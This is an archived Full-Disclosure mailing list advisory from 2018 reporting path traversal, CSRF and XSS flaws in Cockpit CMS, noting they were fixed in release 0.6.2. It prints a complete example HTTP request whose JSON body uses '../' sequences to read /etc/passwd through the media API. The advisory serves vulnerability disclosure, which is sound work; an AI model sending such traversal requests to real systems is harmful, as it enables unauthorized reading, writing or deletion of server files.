| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <hdYgWqCQGMR1u-VwK1Efk-ZHl_bMlpwFLGOpfFBp6XGpyheSP6LF4543lS97f4tMm_wkjFbQm2TsZgXXHQfCaGYVDNQp3dkwj_q6EmQuiJ0=@protonmail.com>
Date: Wed, 10 Oct 2018 08:07:59 +0000
From: Simon Uvarov via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Cockpit CMS Multiple Vulnerabilities (CVE-2018-15538,
CVE-2018-15539, CVE-2018-15540)
#1 Path Traversal
CVE-2018-15540
It is possible to read/write/delete files or list directories by using "../" to traverse to other folders via requests to /cockpit/media/api
Example of a vulnerable request:
POST /cockpit/media/api HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/cockpit/finder
Content-Type: application/json; charset=UTF-8
Content-Length: 53
Cookie: 8071dec2be26139e39a170762581c00f=9me02iusm500432871pq0fjls2
Connection: close
{"cmd":"readfile","path":"../../../../../etc/passwd"}
#2 Application Wide CSRF
CVE-2018-15539
The application lacks anti-csrf protection mechanism, thus, an attacker is able to change API tokens and passwords.
#3 Application Wide XSS
CVE-2018-15538
The application is vulnerable to XSS attacks.
The mentioned issues were targeted in the 0.6.2 release.
Regards,
Simon Uvarov
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists